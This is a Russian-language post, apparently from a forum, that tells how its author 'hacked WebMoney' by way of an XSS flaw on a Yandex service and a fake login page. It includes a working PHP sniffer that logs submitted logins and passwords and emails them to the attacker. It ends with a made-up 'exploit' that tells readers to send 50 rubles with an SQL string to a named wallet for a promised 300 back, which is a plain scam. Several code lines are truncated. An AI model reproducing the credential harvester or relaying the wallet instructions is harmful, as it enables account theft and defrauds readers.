Привет всем!!! Сейчас я расскажу, как я взломал WebMoney.
«Как Все начиналось»
Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак , надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - (target) никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого _pixcher'a_ продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от _pixcher'a_. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.a
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька R406117105932
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом _pixcher'a_ решили еще раз протестировать наш баг и кинуть 50 руб
я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.
"Как выполнить взлом WebMoney на своем компе"
1. Для начала проходим сюда wwwwebmoney.ru
2. Заводим свой личный ID в системе webmoney
3. Регистрируем свой WMR кошельок
4. Ложем на свой счет денег . Ну вам для этого взлома понадобиться 50 рублей
5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей
6. Переводим на этот счет R406117105932 где мы сделали баг
7. Где сообщение получателю пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id ='9' AND n.model_id = «0» AND singer_id = '300''
Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «R406117105932»